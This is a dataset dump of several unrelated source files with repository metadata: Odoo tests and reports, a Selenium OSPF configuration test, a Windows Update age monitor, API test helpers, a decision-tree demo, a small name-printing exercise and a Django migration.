self.recovery_template_custom2,
"We do not return the correct mail template"
)
# Orders that belong to different websites; we should get the default template
self.assertEqual(
(self.so1 + self.so2)._get_cart_recovery_template(),
self.recovery_template_default,
"We do not return the correct mail template"
)
def test_cart_recovery_mail_template_send(self):
"""The goal of this test is to make sure cart recovery works."""
orders = self.so0 + self.so1 + self.so2
self.assertFalse(
any(orders.mapped('cart_recovery_email_sent')),
"The recovery mail should not have been sent yet."
)
self.assertFalse(
any(orders.mapped('access_token')),
"There should not be an access token yet."
)
orders._cart_recovery_email_send()
self.assertTrue(
all(orders.mapped('cart_recovery_email_sent')),
"The recovery mail should have been sent."
)
self.assertTrue(
all(orders.mapped('access_token')),
"All tokens should have been generated."
)
sent_mail = {}
for order in orders:
mail = self.env["mail.mail"].search([
('record_name', '=', order['name'])
])
sent_mail.update({order: mail})
self.assertTrue(
all(len(sent_mail[order]) == 1 for order in orders),
"Each cart recovery mail has been sent exactly once."
)
self.assertTrue(
all(order.access_token in sent_mail[order].body for order in orders),
"Each mail should contain the access token of the corresponding SO."
)
| [
"[email protected]"
] | |
51a07e0d65cb1b371d2bd13a78da51bcdb23a186 | e2e08d7c97398a42e6554f913ee27340226994d9 | /pyautoTest-master(ICF-7.5.0)/test_case/scg/scg_OSPF/test_c140943.py | 12482ba174a604d783884977f16e6d32bb34b597 | [] | no_license | lizhuoya1111/Automated_testing_practice | 88e7be512e831d279324ad710946232377fb4c01 | b3a532d33ddeb8d01fff315bcd59b451befdef23 | refs/heads/master | 2022-12-04T08:19:29.806445 | 2020-08-14T03:51:20 | 2020-08-14T03:51:20 | 287,426,498 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,490 | py |
import pytest
import time
import sys
from os.path import dirname, abspath
sys.path.insert(0, dirname(dirname(abspath(__file__))))
from page_obj.scg.scg_def_ospf import *
from page_obj.scg.scg_def_vlan_interface import *
from page_obj.scg.scg_def_bridge import *
from page_obj.common.rail import *
from page_obj.scg.scg_def_physical_interface import *
from page_obj.common.ssh import *
from page_obj.scg.scg_def_dhcp import *
from page_obj.scg.scg_dev import *
from page_obj.scg.scg_def_ifname_OEM import *
test_id = 140943
def test_c140943(browser):
try:
login_web(browser, url=dev1)
start_ospf_jyl(browser)
time.sleep(0.5)
ospf_general_jyl(browser, route_id="manual", manual_ip="192.168.1.1", static="yes", static_num="16777215", save="yes")
alert = browser.switch_to_alert()
# print(alert.text)
web_info = alert.text
# print(web_info)
# 接受告警
browser.switch_to_alert().accept()
ospf_general_jyl(browser, route_id="auto", static="no", save="yes")
stop_ospf_jyl(browser)
try:
assert "输入数字错误" in web_info
rail_pass(test_run_id, test_id)
except:
rail_fail(test_run_id, test_id)
assert "输入数字错误" in web_info
except Exception as err:
# 如果上面的步骤有报错,重新设备,恢复配置
print(err)
reload(hostip=dev1)
rail_fail(test_run_id, test_id)
assert False
if __name__ == '__main__':
pytest.main(["-v", "-s", "test_c" + str(test_id) + ".py"])
| [
"[email protected]"
] | |
5d635a8b03cfb360411bed2715e152f9905483f0 | 399dae0b5ad9ca27cde175d25b5435958674eb50 | /Script Monitors/Generates Alert if Windows Update is not Downloaded for 60 Days/generates-alert-if-windows-update-is-not-downloaded-for-60-days.py | 1cf0fac3bd8feb56d27fbdf8ec5719d79ccc253a | [] | no_license | kannanch/pythonscripts | 61e3ea9e8ebf6a6b0ec2a4a829664e4507b803ba | 843a522236f9c2cc2aadc68d504c71bb72600bd9 | refs/heads/master | 2020-06-12T11:18:00.404673 | 2019-06-28T11:24:37 | 2019-06-28T11:24:37 | 194,282,297 | 1 | 0 | null | 2019-06-28T13:55:56 | 2019-06-28T13:55:56 | null | UTF-8 | Python | false | false | 2,778 | py | # The script is a template to check UAC status on device.
import os
import sys
import _winreg
def alert(arg):
sys.stderr.write("%d%d%d" % (arg, arg, arg))
vbs=r'''
Set objSession = CreateObject("Microsoft.Update.Session")
Set objSearcher = objSession.CreateUpdateSearcher
Set colHistory = objSearcher.QueryHistory(0, 1)
For Each objEntry in colHistory
Wscript.Echo "Title: " & objEntry.Title
Wscript.Echo "Update application date: " & objEntry.Date
Next
'''
import os
import ctypes
import re
class disable_file_system_redirection:
_disable = ctypes.windll.kernel32.Wow64DisableWow64FsRedirection
_revert = ctypes.windll.kernel32.Wow64RevertWow64FsRedirection
def __enter__(self):
self.old_value = ctypes.c_long()
self.success = self._disable(ctypes.byref(self.old_value))
def __exit__(self, type, value, traceback):
if self.success:
self._revert(self.old_value)
def runvbs(vbs):
workdir=os.environ['PROGRAMDATA']+r'\temp'
if not os.path.isdir(workdir):
os.mkdir(workdir)
with open(workdir+r'\temprun.vbs',"w") as f :
f.write(vbs)
with disable_file_system_redirection():
output=os.popen('cscript.exe "'+workdir+r'\temprun.vbs"').read()
if os.path.isfile(workdir+r'\temprun.vbs'):
os.remove(workdir+r'\temprun.vbs')
return output
output=runvbs(vbs)
sam=re.findall("Update\sapplication\sdate:(.*)",output)[0]
sam1=sam.split(' ')[1]
d1=sam1
import platform
ki=platform.platform()
if "Windows-8" in ki:
print "Win 8"
f = d1.split("/")
d1=f[1] + "/" + f[0].rjust(2,"0") + "/" + f[2].rjust(2,"0")
elif "Windows-10" in ki:
print "win 10"
if 'PROCESSOR_ARCHITEW6432' in os.environ:
f = d1.split("/")
d1=f[1] + "/" + f[0].rjust(2,"0") + "/" + f[2].rjust(2,"0")
else:
f = d1.split("/")
d1=f[0] + "/" + f[1].rjust(2,"0") + "/" + f[2].rjust(2,"0")
elif "Windows-7" in ki:
print "windows 7"
f = d1.split("/")
d1=f[1] + "/" + f[0].rjust(2,"0") + "/" + f[2].rjust(2,"0")
import time
d2=time.strftime("%d/%m/%Y")
from datetime import datetime
date_format = "%d/%m/%Y"
date_format1= "%m/%d/%Y"
if "Windows-10" in ki:
a = datetime.strptime(d1, date_format1)
b = datetime.strptime(d2, date_format)
delta = b - a
else:
a = datetime.strptime(d1, date_format)
b = datetime.strptime(d2, date_format)
delta = b - a
print str(delta.days) + " days Since the last update"
if delta.days >=60:
print "Updates are not working properly"
alert(1)
else:
print "Updates are perfectly working"
alert(0)
| [
"[email protected]"
] | |
c2321c30432183d23b15ae143923eaf6ad07ae89 | 7cdb18e0a7ef01a34ec602bb31aa915c482fcd24 | /hujian_api/API_service/Course/c_class.py | 3025bce96eba7f43eb8eea3acbd91dd212fd1b56 | [] | no_license | wangdan377/Python_API | 6adac56974f9c6af238895a3101db0e3f0667ba1 | 38b31d4d02740d359a7e47fb3a3975045f00288e | refs/heads/master | 2023-02-18T14:39:03.009815 | 2021-01-20T12:59:52 | 2021-01-20T12:59:52 | 311,855,608 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,712 | py | import pytest
import allure
import requests
import json
import time
import random
from Common import Post
from Common import Get
from Common import Assert
from Common import Consts
class Editor_filter:
#登录
def filter_00(self):
sessionX = requests.session()
post_req = Post.Post()
ass = Assert.Assertions()
url = 'http://47.99.180.185:3999/login'
params = {'username':'[email protected]', 'password':'helloworld'}
res = post_req.post_model_b(sessionX, url, params)
resCode = res['code']
resText = res['text']
assert ass.assert_code(resCode, 200)
assert ass.assert_in_text(resText, '成功')
Consts.RESULT_LIST.append('True')
return sessionX
#获取教程分类列表
def filter_01(self):
sessionX = requests.session()
get_req = Get.Get()
ass = Assert.Assertions()
times = int(time.time())
rNumber = random.randint(1,100)
url = 'http://47.99.180.185:2999/v1/courses/getProductType?lang=zh_cn&productId=3'
res = get_req.get_model_a(sessionX, url)
print(res)
resCode = res['code']
resText = res['text']
assert ass.assert_code(resCode, 200)
assert ass.assert_in_text(resText, '成功')
Consts.RESULT_LIST.append('True')
#获取分类下教程列表
def filter_02(self,id):
sessionX = requests.session()
get_req = Get.Get()
ass = Assert.Assertions()
times = int(time.time())
rNumber = random.randint(1,100)
url = 'http://47.99.180.185:2999/v1/music/list?page=1&pageSize=10&albumId='+id
res = get_req.get_model_a(sessionX, url)
print(res)
resCode = res['code']
resText = res['text']
assert ass.assert_code(resCode, 200)
assert ass.assert_in_text(resText, '成功')
Consts.RESULT_LIST.append('True')
#查询教程产品下的说明书
def filter_03(self):
sessionX = requests.session()
get_req = Get.Get()
ass = Assert.Assertions()
times = int(time.time())
rNumber = random.randint(1,100)
url = 'http://47.99.180.185:2999/v1/music/hot/list?page=1&pageSize=10'
res = get_req.get_model_a(sessionX, url)
print(res)
resCode = res['code']
resText = res['text']
assert ass.assert_code(resCode, 200)
assert ass.assert_in_text(resText, '成功')
Consts.RESULT_LIST.append('True')
#查询投放的教程产品
#模糊查询分类
#分类下视频获取
#获取zfilm首页展示分类列表
if __name__ == '__main__':
a = Editor_filter()
a.filter_02('62')
| [
"[email protected]"
] | |
72a060428592795437ae3329b7ec56762c28a05b | 7275f7454ce7c3ce519aba81b3c99994d81a56d3 | /Programming-Collective-Intelligence/ch07/main.py | cea965bec22a5c20cdc4081bc9c0948547ffe229 | [] | no_license | chengqiangaoci/back | b4c964b17fb4b9e97ab7bf0e607bdc13e2724f06 | a26da4e4f088afb57c4122eedb0cd42bb3052b16 | refs/heads/master | 2020-03-22T08:36:48.360430 | 2018-08-10T03:53:55 | 2018-08-10T03:53:55 | 139,777,994 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,135 | py | import treepredict
# main function
# print('<----DivideSet---->')
# for item in treepredict.divideset(treepredict.my_data, 2, 'yes'):
# print(item)
#
print('\n<----Build and Display the Tree---->')
tree = treepredict.buildtree(treepredict.my_data)
treepredict.printtree(tree)
#
# print('\n<----Graphical Display---->')
# path = 'output/treeview.jpg'
# treepredict.drawtree(tree, jpeg=path)
# print("picture has been saved in " + path)
#
# print('\n<----Classify and prune---->')
# test = ['(direct)', 'USA', 'yes', 5]
# print(test)
# print(treepredict.classify(test, tree), '\n')
#
# print('Before pune:')
# treepredict.printtree(tree)
# treepredict.prune(tree, 1.0)
# print('\nAfter pune:')
# treepredict.printtree(tree)
# print('<----Zillow API---->')
# import zillow
# # housedata = zillow.getpricelist()
# # print('house data saved!')
# housedata = zillow.getdata('input/housedata.txt')
# print('house data read!')
# housetree = treepredict.buildtree(housedata, scoref=treepredict.variance)
# treepredict.printtree(housetree)
# treepredict.drawtree(housetree, 'output/housetree.jpg')
# HotOrNot API is deprecated since 2008
| [
"[email protected]"
] | |
ada9eb0e3ce075ebc01f1203fd530aaf833dafc4 | 4bdb8e324a833c10380bb7b1f436d1e9629c873c | /Ekeopara_Praise/Phase 1/Python Basic 1/Day2 Tasks/Task 5.py | 1d1d5cde955ffa3a4b7be09d0ba0fa45cd7803f2 | [
"MIT"
] | permissive | dreamchild7/python-challenge-solutions | e3831a57447f6132dd098be8b941cc27db92ace2 | 29e2ca780e86fc8a3e9d4def897c26bfa6d6493d | refs/heads/master | 2022-11-08T17:23:57.763110 | 2020-06-19T08:38:20 | 2020-06-19T08:38:20 | 263,923,130 | 0 | 0 | MIT | 2020-05-14T13:29:33 | 2020-05-14T13:29:32 | null | UTF-8 | Python | false | false | 253 | py | #5. Write a Python program which accepts the user's first and last name and print them in reverse order with a space between them.
f_name = str(input("Enter your first name: "))
l_name = str(input("Enter your last name: "))
print(f"{l_name} {f_name}") | [
"[email protected]"
] | |
186c553da83db53ac91681c5d1650c41cc85b315 | c4702d1a06640555829b367852138cc93ba4a161 | /dym_work_order/report/dym_work_order_wip_report.py | 5f8b0c3e31094e8bc280dd6611091fac61612f93 | [] | no_license | Rizalimami/dym | 0ecadf9c049b22ebfebf92e4eab6eaad17dd3e26 | af1bcf7b77a3212bc8a8a0e41e6042a134587ed4 | refs/heads/master | 2020-04-08T10:56:43.605698 | 2018-11-27T06:44:08 | 2018-11-27T06:44:08 | 159,287,876 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,475 | py | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from openerp.osv import osv
from openerp.report import report_sxw
class dym_work_order_wip(report_sxw.rml_parse):
def __init__(self, cr, uid, name, context):
super(dym_work_order_wip, self).__init__(cr, uid, name, context=context)
self.localcontext.update({
'time': time,
'get_pricelist': self._get_pricelist,
'lines_a': self._lines_a,
'no_urut': self.no_urut,
})
self.no = 0
def no_urut(self):
self.no+=1
return self.no
def _get_pricelist(self, pricelist_id):
pricelist = self.pool.get('product.pricelist').read(self.cr, self.uid, [pricelist_id], ['name'], context=self.localcontext)[0]
return pricelist['name']
def _lines_a(self, accounts):
self.cr.execute("SELECT wo.name as name, wo.date as date, wo.no_pol as no_pol, wo.type as type, wo.state as state, wo.state_wo as state_wo, emp.name_related as mekanik_name from dym_work_order wo left join hr_employee emp on wo.mekanik_id = emp.id where state !='draft' and state !='done'")
res = self.cr.dictfetchall()
return res
class report_dym_work_order_wip(osv.AbstractModel):
_name = 'report.dym_work_order.dym_work_order_wip_report'
_inherit = 'report.abstract_report'
_template = 'dym_work_order.dym_work_order_wip_report'
_wrapped_report_class = dym_work_order_wip
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| [
"[email protected]"
] | |
753ad43022f7a3191bb72fa131af59d5a1d65fe8 | b92fb53a2bebb8fd534258666b5ac9b9703af44b | /backend/home/migrations/0002_load_initial_data.py | 64a22060ef08f587e02ba57b0fdf868eb35edced | [] | no_license | crowdbotics-apps/my-books-17969 | 7d017780d7c51210820d153dcab35e1196cb9652 | 3f4f66c998bce11289b1fd2bdd74d2cf769cc2f0 | refs/heads/master | 2022-10-07T11:09:54.346439 | 2020-06-09T18:14:21 | 2020-06-09T18:14:21 | 271,076,921 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,286 | py | from django.db import migrations
def create_customtext(apps, schema_editor):
CustomText = apps.get_model("home", "CustomText")
customtext_title = "My Books"
CustomText.objects.create(title=customtext_title)
def create_homepage(apps, schema_editor):
HomePage = apps.get_model("home", "HomePage")
homepage_body = """
<h1 class="display-4 text-center">My Books</h1>
<p class="lead">
This is the sample application created and deployed from the Crowdbotics app.
You can view list of packages selected for this application below.
</p>"""
HomePage.objects.create(body=homepage_body)
def create_site(apps, schema_editor):
Site = apps.get_model("sites", "Site")
custom_domain = "my-books-17969.botics.co"
site_params = {
"name": "My Books",
}
if custom_domain:
site_params["domain"] = custom_domain
Site.objects.update_or_create(defaults=site_params, id=1)
class Migration(migrations.Migration):
dependencies = [
("home", "0001_initial"),
("sites", "0002_alter_domain_unique"),
]
operations = [
migrations.RunPython(create_customtext),
migrations.RunPython(create_homepage),
migrations.RunPython(create_site),
]
| [
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.